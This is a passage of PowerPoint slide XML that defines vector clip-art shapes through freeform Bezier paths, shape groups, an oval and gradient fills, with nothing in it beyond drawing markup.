                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="29" y="102"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="108"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="65"/>
                        <a:pt x="111" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="117"/>
                        <a:pt x="109" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="165"/>
                        <a:pt x="112" y="170"/>
                        <a:pt x="119" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="173"/>
                        <a:pt x="162" y="183"/>
                        <a:pt x="169" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="186"/>
                        <a:pt x="193" y="176"/>
                        <a:pt x="196" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="163"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="209" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="154"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="141"/>
                        <a:pt x="237" y="135"/>
                        <a:pt x="237" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="96"/>
                        <a:pt x="198" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="123"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="193" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="193" y="73"/>
                        <a:pt x="193" y="7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91" name="Freeform 1156"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3030" y="1595"/>
                  <a:ext cx="43" cy="27"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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5"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="48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92" name="Freeform 1157"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2977" y="1706"/>
                  <a:ext cx="104" cy="117"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 159 w 159"/>
                    <a:gd name="T1" fmla="*/ 6 h 180"/>
                    <a:gd name="T2" fmla="*/ 132 w 159"/>
                    <a:gd name="T3" fmla="*/ 21 h 180"/>
                    <a:gd name="T4" fmla="*/ 81 w 159"/>
                    <a:gd name="T5" fmla="*/ 11 h 180"/>
                    <a:gd name="T6" fmla="*/ 72 w 159"/>
                    <a:gd name="T7" fmla="*/ 0 h 180"/>
                    <a:gd name="T8" fmla="*/ 68 w 159"/>
                    <a:gd name="T9" fmla="*/ 19 h 180"/>
                    <a:gd name="T10" fmla="*/ 17 w 159"/>
                    <a:gd name="T11" fmla="*/ 32 h 180"/>
                    <a:gd name="T12" fmla="*/ 1 w 159"/>
                    <a:gd name="T13" fmla="*/ 55 h 180"/>
                    <a:gd name="T14" fmla="*/ 1 w 159"/>
                    <a:gd name="T15" fmla="*/ 145 h 180"/>
                    <a:gd name="T16" fmla="*/ 36 w 159"/>
                    <a:gd name="T17" fmla="*/ 156 h 180"/>
                    <a:gd name="T18" fmla="*/ 43 w 159"/>
                    <a:gd name="T19" fmla="*/ 145 h 180"/>
                    <a:gd name="T20" fmla="*/ 42 w 159"/>
                    <a:gd name="T21" fmla="*/ 73 h 180"/>
                    <a:gd name="T22" fmla="*/ 42 w 159"/>
                    <a:gd name="T23" fmla="*/ 73 h 180"/>
                    <a:gd name="T24" fmla="*/ 42 w 159"/>
                    <a:gd name="T25" fmla="*/ 72 h 180"/>
                    <a:gd name="T26" fmla="*/ 42 w 159"/>
                    <a:gd name="T27" fmla="*/ 66 h 180"/>
                    <a:gd name="T28" fmla="*/ 42 w 159"/>
                    <a:gd name="T29" fmla="*/ 64 h 180"/>
                    <a:gd name="T30" fmla="*/ 42 w 159"/>
                    <a:gd name="T31" fmla="*/ 63 h 180"/>
                    <a:gd name="T32" fmla="*/ 59 w 159"/>
                    <a:gd name="T33" fmla="*/ 41 h 180"/>
                    <a:gd name="T34" fmla="*/ 103 w 159"/>
                    <a:gd name="T35" fmla="*/ 30 h 180"/>
                    <a:gd name="T36" fmla="*/ 103 w 159"/>
                    <a:gd name="T37" fmla="*/ 30 h 180"/>
                    <a:gd name="T38" fmla="*/ 59 w 159"/>
                    <a:gd name="T39" fmla="*/ 41 h 180"/>
                    <a:gd name="T40" fmla="*/ 42 w 159"/>
                    <a:gd name="T41" fmla="*/ 63 h 180"/>
                    <a:gd name="T42" fmla="*/ 42 w 159"/>
                    <a:gd name="T43" fmla="*/ 71 h 180"/>
                    <a:gd name="T44" fmla="*/ 42 w 159"/>
                    <a:gd name="T45" fmla="*/ 72 h 180"/>
                    <a:gd name="T46" fmla="*/ 42 w 159"/>
                    <a:gd name="T47" fmla="*/ 77 h 180"/>
                    <a:gd name="T48" fmla="*/ 42 w 159"/>
                    <a:gd name="T49" fmla="*/ 77 h 180"/>
                    <a:gd name="T50" fmla="*/ 43 w 159"/>
                    <a:gd name="T51" fmla="*/ 154 h 180"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 154 h 180"/>
                    <a:gd name="T54" fmla="*/ 43 w 159"/>
                    <a:gd name="T55" fmla="*/ 157 h 180"/>
                    <a:gd name="T56" fmla="*/ 84 w 159"/>
                    <a:gd name="T57" fmla="*/ 157 h 180"/>
                    <a:gd name="T58" fmla="*/ 85 w 159"/>
                    <a:gd name="T59" fmla="*/ 77 h 180"/>
                    <a:gd name="T60" fmla="*/ 89 w 159"/>
                    <a:gd name="T61" fmla="*/ 69 h 180"/>
                    <a:gd name="T62" fmla="*/ 141 w 159"/>
                    <a:gd name="T63" fmla="*/ 55 h 180"/>
                    <a:gd name="T64" fmla="*/ 159 w 159"/>
                    <a:gd name="T65" fmla="*/ 25 h 180"/>
                    <a:gd name="T66" fmla="*/ 159 w 159"/>
                    <a:gd name="T67" fmla="*/ 8 h 180"/>
                    <a:gd name="T68" fmla="*/ 159 w 159"/>
                    <a:gd name="T69" fmla="*/ 6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9" h="180">
                      <a:moveTo>
                        <a:pt x="159" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="17"/>
                        <a:pt x="140" y="23"/>
                        <a:pt x="132" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="20"/>
                        <a:pt x="94" y="14"/>
                        <a:pt x="81" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="10"/>
                        <a:pt x="73" y="5"/>
                        <a:pt x="72" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="19"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="68" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="19"/>
                        <a:pt x="28" y="28"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="36"/>
                        <a:pt x="2" y="42"/>
                        <a:pt x="1" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="55"/>
                        <a:pt x="0" y="135"/>
                        <a:pt x="1" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="163"/>
                        <a:pt x="25" y="165"/>
                        <a:pt x="36" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="153"/>
                        <a:pt x="43" y="149"/>
                        <a:pt x="43" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="130"/>
                        <a:pt x="42" y="102"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="68"/>
                        <a:pt x="42" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="63"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="50"/>
                        <a:pt x="48" y="44"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="37"/>
                        <a:pt x="101" y="30"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="28"/>
                        <a:pt x="107" y="28"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="30"/>
                        <a:pt x="68" y="37"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="44"/>
                        <a:pt x="43" y="50"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="74"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="155"/>
                        <a:pt x="43" y="156"/>
                        <a:pt x="43" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="180"/>
                        <a:pt x="84" y="177"/>
                        <a:pt x="84" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="142"/>
                        <a:pt x="85" y="80"/>
                        <a:pt x="85" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="74"/>
                        <a:pt x="87" y="70"/>
                        <a:pt x="89" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="69"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="141" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="159" y="47"/>
                        <a:pt x="159" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="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tx2"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:schemeClr val="tx2">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx2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Oval 1158"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="3025" y="1560"/>
                  <a:ext cx="52" cy="52"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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Freeform 1159"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3038" y="1626"/>
                  <a:ext cx="16" cy="76"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 55"/>
                    <a:gd name="T1" fmla="*/ 0 h 265"/>
                    <a:gd name="T2" fmla="*/ 14 w 55"/>
                    <a:gd name="T3" fmla="*/ 22 h 265"/>
                    <a:gd name="T4" fmla="*/ 5 w 55"/>
                    <a:gd name="T5" fmla="*/ 239 h 265"/>
                    <a:gd name="T6" fmla="*/ 29 w 55"/>
                    <a:gd name="T7" fmla="*/ 265 h 265"/>
                    <a:gd name="T8" fmla="*/ 52 w 55"/>
                    <a:gd name="T9" fmla="*/ 253 h 265"/>
                    <a:gd name="T10" fmla="*/ 38 w 55"/>
                    <a:gd name="T11" fmla="*/ 29 h 265"/>
                    <a:gd name="T12" fmla="*/ 55 w 55"/>
                    <a:gd name="T13" fmla="*/ 15 h 265"/>
                    <a:gd name="T14" fmla="*/ 0 w 55"/>
                    <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="239"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="253"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5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40505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6350" cap="flat" cmpd="sng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95" name="Freeform 1160"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3035" y="1683"/>
                  <a:ext cx="59" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 28 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="8"/>
                        <a:pt x="28" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="66" y="38"/>
                        <a:pt x="91" y="32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68" name="Group 1161"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2724" y="1660"/>
                <a:ext cx="429" cy="228"/>
                <a:chOff x="786" y="2382"/>
                <a:chExt cx="1190" cy="634"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="978" name="Freeform 1162"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1933" y="2464"/>
                  <a:ext cx="43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79" name="Freeform 1163"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1888" y="2464"/>
                  <a:ext cx="45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0" name="Freeform 1164"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1038" y="2694"/>
                  <a:ext cx="46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4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1" name="Freeform 1165"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1084" y="2694"/>
                  <a:ext cx="42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2" name="Freeform 1166"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="786" y="2625"/>
                  <a:ext cx="45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3" name="Freeform 1167"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="831" y="2625"/>
                  <a:ext cx="43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Freeform 1168"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1633" y="2382"/>
                  <a:ext cx="42" cy="325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Freeform 1169"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1633" y="2394"/>
                  <a:ext cx="42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4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6" name="Freeform 1170"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1675" y="2394"/>
                  <a:ext cx="46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1171"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="786" y="2382"/>
                  <a:ext cx="1190" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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8" name="Freeform 1172"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1084" y="2464"/>
                  <a:ext cx="892" cy="285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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9" name="Freeform 1173"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="786" y="2625"/>
                  <a:ext cx="298" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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9" name="Freeform 1174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2932" y="1717"/>
                <a:ext cx="158" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 668 w 668"/>
                  <a:gd name="T1" fmla="*/ 76 h 177"/>
                  <a:gd name="T2" fmla="*/ 377 w 668"/>
                  <a:gd name="T3" fmla="*/ 0 h 177"/>
                  <a:gd name="T4" fmla="*/ 0 w 668"/>
                  <a:gd name="T5" fmla="*/ 102 h 177"/>
                  <a:gd name="T6" fmla="*/ 288 w 668"/>
                  <a:gd name="T7" fmla="*/ 177 h 177"/>
                  <a:gd name="T8" fmla="*/ 668 w 668"/>
                  <a:gd name="T9" fmla="*/ 76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8" h="177">
                    <a:moveTo>
                      <a:pt x="668" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="377" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="7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970" name="Group 1175"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2844" y="1636"/>
                <a:ext cx="134" cy="89"/>
                <a:chOff x="1859" y="2279"/>
                <a:chExt cx="372" cy="247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="971" name="Freeform 1176"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2412"/>
                  <a:ext cx="372" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25173"/>
                    <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T3" fmla="*/ 0 h 6756"/>
                    <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                    <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                    <a:gd name="T8" fmla="*/ 0 w 25173"/>
                    <a:gd name="T9" fmla="*/ 3378 h 67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173" h="6756">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25173" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="6756"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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72" name="Freeform 1177"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2045" y="2462"/>
